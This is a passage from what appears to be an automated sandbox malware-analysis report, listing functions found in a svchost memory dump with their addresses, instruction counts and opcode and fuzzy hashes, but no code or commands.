                                                                    • Instruction ID: 292d84985a1ea3a99ed9d95cc4ebb95b8ef9e3f8a07c73df9728dc6de76e6b82
                                                                    • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                    • Instruction Fuzzy Hash: 93012832100B449FDB22E766C900EABB7EDFFC4254F09451EA9468B680DE71E402CB61
                                                                    Function 036720F0 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9ca2c8fef75fbfe160ed619a0a8349c6392c8bfa66e07faea3c5be0e23179cc
                                                                    • Instruction ID: c88ad64898c5cc1771e5e4fe16d1f038eb2dd18c91a077b61eeab28567a77b42
                                                                    • Opcode Fuzzy Hash: d9ca2c8fef75fbfe160ed619a0a8349c6392c8bfa66e07faea3c5be0e23179cc
                                                                    • Instruction Fuzzy Hash: B6116935A0020CEBDB05EFA8C954FAE7BB9FB48244F004099EA019B390DA35EE11CB90
                                                                    Function 03629353 Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                    • Instruction ID: c4336b39ccda30246c053e80c8c6f66b341711bc3bfa2cf2541de428d6e7dd3e
                                                                    • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                    • Instruction Fuzzy Hash: 63117C32900F129FD721DE15C980B22B7E4BF807A2F1A886CD4894A6A5C374E891CF10
                                                                    Function 036533A5 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                    • Instruction ID: da4e91cf17d8bac2ae839b41f46928180603259a342dec4f6d3768e879d0f888
                                                                    • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                    • Instruction Fuzzy Hash: 0401863A700205A7CB12DA9ADD00F5FBA6C9F94A81F254439FD15DB360EA30DD02C774
                                                                    Function 0366D1D0 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                    • Instruction ID: f76244ab344fb4df30b3066303bed062fbfa626ef1648158eb5d951b3710a666
                                                                    • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                    • Instruction Fuzzy Hash: 1D0147BAB106049BD711DA54E804F65B3ADEFC4668F144159FF128F380CB34DC01CB98
                                                                    Function 0362826B Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 457b4f43a5e5d9c577d627971690c07d19d696b6a9381d934377f3d6e4edc0aa
                                                                    • Instruction ID: 5f040be70e1cdfb4621725d596098f9da005aed60bd61063cb8d91650e8ea516
                                                                    • Opcode Fuzzy Hash: 457b4f43a5e5d9c577d627971690c07d19d696b6a9381d934377f3d6e4edc0aa
                                                                    • Instruction Fuzzy Hash: 56012035701A14DFD714EF65DD109AFBBB8EF45210B1A402DD902AB641EE30DD01CBD9
                                                                    Function 0364E016 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                    • Instruction ID: 9f051f0cafd11d7db0c96c9f31171ffbe7030b27eadd47ede9db5802b45d4cb0
                                                                    • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                    • Instruction Fuzzy Hash: 91015672600A809FD322D71DCA48F76BBECEB49B50F0D04A6E815CBBA2D729DC51C625
                                                                    Function 036EF367 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 28eb0563d2d3d1be69d1a7ca1f472b6d9734c01e78e3bfd62b72e92d8b014205
                                                                    • Instruction ID: 4704847243fe61f21450171e2ff5355f1a94bd49ae16f9d525b6314846639869
                                                                    • Opcode Fuzzy Hash: 28eb0563d2d3d1be69d1a7ca1f472b6d9734c01e78e3bfd62b72e92d8b014205
                                                                    • Instruction Fuzzy Hash: 55018F75A11358EBDB10EBA9D805FAEBBB8EF44700F44406AB500EF380DAB4D901C7A4
                                                                    Function 0365BBA0 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                    • Instruction ID: 1ef8707618a9047682c79d39a37934b5867491b3df4c45adf9e52cfe0a0fd8d1
                                                                    • Opcode Fuzzy Hash: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                    • Instruction Fuzzy Hash: 7F017177900129DBCB28CF49C590BADB7B5EF45710F1900B9EC06A7340DB71AE00DB94
                                                                    Function 036F972B Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                    • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                    • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                    • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                    Function 03705636 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc8b07abd60fb71f9e7d644ca86fdc3e78e5a6f765da5a35bc196ecdce60ed25
                                                                    • Instruction ID: b9f5f8f316792b186578b9b949e6980f17c3857c257f0498157b5a3da0a28c24
                                                                    • Opcode Fuzzy Hash: fc8b07abd60fb71f9e7d644ca86fdc3e78e5a6f765da5a35bc196ecdce60ed25
                                                                    • Instruction Fuzzy Hash: 4C118078D10249EFCB04DFA9D444A9EB7B4FF18704F14805AB814EB381D734DA02CB95
                                                                    Function 0362C310 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                    • Instruction ID: 8767c2154e4d7291eb75b7148949b1237a59a9d8ec0ef9d18f121c0e3c5de0cd
                                                                    • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                    • Instruction Fuzzy Hash: 45F0FC37244F329BC732DA594880F6FAD998FC9AA4F1B0439E1099F304CA658C025ED1
                                                                    Function 03705152 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c6f4f05671e9f1230e162b98a860251649f6ffc591254f8c8c4ca7feb48caad2
                                                                    • Instruction ID: 1736252855047ee0d8d12a2bd90f1a2f6c2feff6d1071f91daea75b88f444b57
                                                                    • Opcode Fuzzy Hash: c6f4f05671e9f1230e162b98a860251649f6ffc591254f8c8c4ca7feb48caad2
                                                                    • Instruction Fuzzy Hash: 87012C75A10209EBDB00DFA9D941AEEBBF8FF49310F14405AE900EB380D674AA018BA5
                                                                    Function 03705060 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 949e36def529ad5df9f9ddb4d32baef4e23082be5d0dd99124e6adfd80ec623f
                                                                    • Instruction ID: 5332e48169bb9aede17028dc8e2fdd59d3df02fb0bf514b7223fdde0bb982519
                                                                    • Opcode Fuzzy Hash: 949e36def529ad5df9f9ddb4d32baef4e23082be5d0dd99124e6adfd80ec623f
                                                                    • Instruction Fuzzy Hash: B5012C75A1030DEBDB04DFA9D941AEEB7F8EF49310F50405AF901EB381D674AA018BA5
                                                                    Function 0365C073 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                    • Instruction ID: 52ede60d94fa9432c90626fc0e199e3fd3d42f54b7b09238c7f9041e4b0765d1
                                                                    • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                    • Instruction Fuzzy Hash: 65F0AFB3A00610ABD324DF4D9940E57F7EADBC0A80F088128A905CB320EA31DD04CB90
                                                                    Function 037050D9 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: edfcb549e1edbcc164ce3daae0ab61b33f836980f8244fec9b7d94a202dbdb93
                                                                    • Instruction ID: 838d6c660a36fead370756d490107e3cdf8ef0aba0ddeb654130ff6b08563926
                                                                    • Opcode Fuzzy Hash: edfcb549e1edbcc164ce3daae0ab61b33f836980f8244fec9b7d94a202dbdb93
                                                                    • Instruction Fuzzy Hash: E4012CB5A00309EBDB00DFA9D945AEEB7F8EF49310F50405AE500FB381D674A9018BA5
                                                                    Function 03665734 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                    • Instruction ID: 77c2a80cff380f4130b742b7b289696d53c673ae205bc3cc8560869e5803852c
                                                                    • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                    • Instruction Fuzzy Hash: 62F0FF72A01214BFE319CF5CC945F6AFBEDEB46690F094079D602DB231E671EE04CA94
                                                                    Function 036EF78A Relevance: .0, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f80d8643c94853e10e5306c1c2fdc016f314b3c23483181dbad9838823764ca4
                                                                    • Instruction ID: 71907c388c790b3d811d7a416b77160e9ae5f2195d0bf026fa2f2b3d2ae6f5e4
                                                                    • Opcode Fuzzy Hash: f80d8643c94853e10e5306c1c2fdc016f314b3c23483181dbad9838823764ca4
                                                                    • Instruction Fuzzy Hash: C0010CB4E01749AFCF04DFA9D545AAEBBF4EF08304F10806AA855EB341E674DA00DB95
                                                                    Function 036EF2F8 Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf1653923784b0b0c6f54cc93ba63c63fb01472394b1b66733c5e30343ecc6ca
                                                                    • Instruction ID: f93f63f241f8d96483ee9a6d12696d48df59eb776cbc85be8c11dcca7fffcee1
                                                                    • Opcode Fuzzy Hash: bf1653923784b0b0c6f54cc93ba63c63fb01472394b1b66733c5e30343ecc6ca
                                                                    • Instruction Fuzzy Hash: E9F0C876F11348ABDB04DFB9C905AEEB7B8EF44710F00805AE501EB380DA75D9058795
                                                                    Function 037061E5 Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3369c335e10458e447d0b5fa57f19f15a4a035caee9f9d756c5098b80ccddbb1
                                                                    • Instruction ID: 0799bd445c09edaad23514940cc2d6f1d7235c922086bb68c02ec2ade1eea6f6
                                                                    • Opcode Fuzzy Hash: 3369c335e10458e447d0b5fa57f19f15a4a035caee9f9d756c5098b80ccddbb1
                                                                    • Instruction Fuzzy Hash: 7E018F71A00258DBCB00DFA9D855AEEB7F8EF48310F14405AE500AB380D778EA01CB99
                                                                    Function 0366724D Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                    • Instruction ID: 4f5266759d88b01cf4f50f0b064c4e734ef84f12d55654f4f75e6fdde86c2268
                                                                    • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                    • Instruction Fuzzy Hash: B4F0F675A11355ABEB10D7AACA40FABFBAC9F80658F088595F9029B240DA30E940C758
                                                                    Function 037053FC Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 01c7c2cdad686d23e45db5bfd9538ef580b1af2983026a07dc9e34b7524183fe
                                                                    • Instruction ID: 85cde8ca7345db8d7609492d8f6b59a104e160e9d3fa04962e559082716be653
                                                                    • Opcode Fuzzy Hash: 01c7c2cdad686d23e45db5bfd9538ef580b1af2983026a07dc9e34b7524183fe
                                                                    • Instruction Fuzzy Hash: 7B011A74E00209DFDB04DFA9D545B9EF7F4FF08300F148269A519EB382EA749A40CB95
                                                                    Function 0362C0F0 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0622290fbb8df94890b676cf30aa8ffe978b2e3855a4d0dacbbcda034e23dd33
                                                                    • Instruction ID: c7c0a44260b78f7450a14d4b3f81b058a4e654f1e5648f5a8e687b45fcb62ac7
                                                                    • Opcode Fuzzy Hash: 0622290fbb8df94890b676cf30aa8ffe978b2e3855a4d0dacbbcda034e23dd33
                                                                    • Instruction Fuzzy Hash: BBF02B712047245BE315D659DD17B673E99DBD0651F2A806AE7058F3C0EE70DC018794
                                                                    Function 03703749 Relevance: .0, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                    • Instruction ID: 31de4e04013b1c4ec6057ee7d59a0a6ab8350afb0833a2672a65de447cabcf76
                                                                    • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                    • Instruction Fuzzy Hash: 2AF04FBA940304BFE711EBA4CD41FDA77FCEB04714F10016AAA16DA1D0EA70AA44CB94
                                                                    Function 036D437C Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                    • Instruction ID: 331030cd5d91319d6643b8eea1c28c16f97d2fead2788fc95f51a39167ab1f96
                                                                    • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                    • Instruction Fuzzy Hash: DEF08935B41B2247DB77EA6F9510B2EE2559F80A50B4F052C9556CFF40DF70DC018794
                                                                    Function 036EF3E6 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1c2db69c223cf5b712f0009a9c9c2f9102ad27a7f4679d6ffbee406bccf048b
                                                                    • Instruction ID: e16628462a0112ea6cab47178ff2d38b8999c1dbd2c6b105ec2074b6355b2ed9
                                                                    • Opcode Fuzzy Hash: e1c2db69c223cf5b712f0009a9c9c2f9102ad27a7f4679d6ffbee406bccf048b
                                                                    • Instruction Fuzzy Hash: 5DF04F75E01348EFCB04EFA9D545A9EB7F4EF08300F508069B945EB382D674DA01CB55
                                                                    Function 036292FF Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ee942ddc1b6bf002d11563af606e355c8b228b598197ad8cce22de3d1396f20
                                                                    • Instruction ID: 321ac88067a363630f58c84dc12ae148087275ad6c1b33801905834a9105faca
                                                                    • Opcode Fuzzy Hash: 2ee942ddc1b6bf002d11563af606e355c8b228b598197ad8cce22de3d1396f20
                                                                    • Instruction Fuzzy Hash: F7F0FA32200B40ABC731EB09CD04F9ABBEDEFC4B00F19012DA94283290C7A1A908CAA0
                                                                    Function 036347FB Relevance: .0, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad5bf681d77475fe1f3a5c0182c9de2b686f9fac84c58a70a42ec50d79320987
                                                                    • Instruction ID: 268d06df24e9fd3ace0d8f1f16e42549a1d46b42b3445e9da42dcd89a2a00756
                                                                    • Opcode Fuzzy Hash: ad5bf681d77475fe1f3a5c0182c9de2b686f9fac84c58a70a42ec50d79320987
                                                                    • Instruction Fuzzy Hash: AFF090399127D09ED723CB5ACA44B21F7D8DB03664F0C89AAD48A87641CF34D881CA50
                                                                    Function 036EF6C7 Relevance: .0, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cdfd0fa44d5ed51b69b90b7dfbb1e7418d677247e76ae7802a259ca2672a66f7
                                                                    • Instruction ID: c441be79009d867f33cd99f52a975aa3add421d3466b1f7b7d070cb1d1bf6bca
                                                                    • Opcode Fuzzy Hash: cdfd0fa44d5ed51b69b90b7dfbb1e7418d677247e76ae7802a259ca2672a66f7
                                                                    • Instruction Fuzzy Hash: 55F06D79A10348EBDB04EFA9D909EAEB7F4EF08304F404069E501EB381EA74D901CB58
                                                                    Function 036F0115 Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cef8353970f5f15c084f3c096543240baa731534450aa606ced8581e6dff8381
                                                                    • Instruction ID: f7b71183d1876fd437421208d4d15b3b308495d3a6aa0e63819d0b1dabaee533
                                                                    • Opcode Fuzzy Hash: cef8353970f5f15c084f3c096543240baa731534450aa606ced8581e6dff8381
                                                                    • Instruction Fuzzy Hash: 01F0273A4167C04ECF31FB68A650391AF599752014F1D108EC5E15B306C9B88483C624
                                                                    Function 0370539D Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d8834f43084d3a8aa023cc17cb21fab90b08f3c6a9f512e18630ca5a591c12b9
                                                                    • Instruction ID: f93adc97dbb723d6e36df74681b44b904dec480ed4b1affb6dec77a1dc374b85
                                                                    • Opcode Fuzzy Hash: d8834f43084d3a8aa023cc17cb21fab90b08f3c6a9f512e18630ca5a591c12b9
                                                                    • Instruction Fuzzy Hash: F8F03A74A14348EBDB04EBB9E545AAEB7B4EB08204F608059A501EB281DA74D9019B69
                                                                    Function 037052E2 Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8a583e2cd2c83fe574c0afc55df1cd5f983ee96a56343f9064cdb6fac9f776c
                                                                    • Instruction ID: 9c614fec6fe38492424ff415325c5cf53237f99c70eea97b869d51d76fefdd63
                                                                    • Opcode Fuzzy Hash: a8a583e2cd2c83fe574c0afc55df1cd5f983ee96a56343f9064cdb6fac9f776c
                                                                    • Instruction Fuzzy Hash: 18F0BE74A10348EBDB04EFB9E905EAEB3F4EF08304F544058A401EB3C1EA74D900CB58
                                                                    Function 03705283 Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
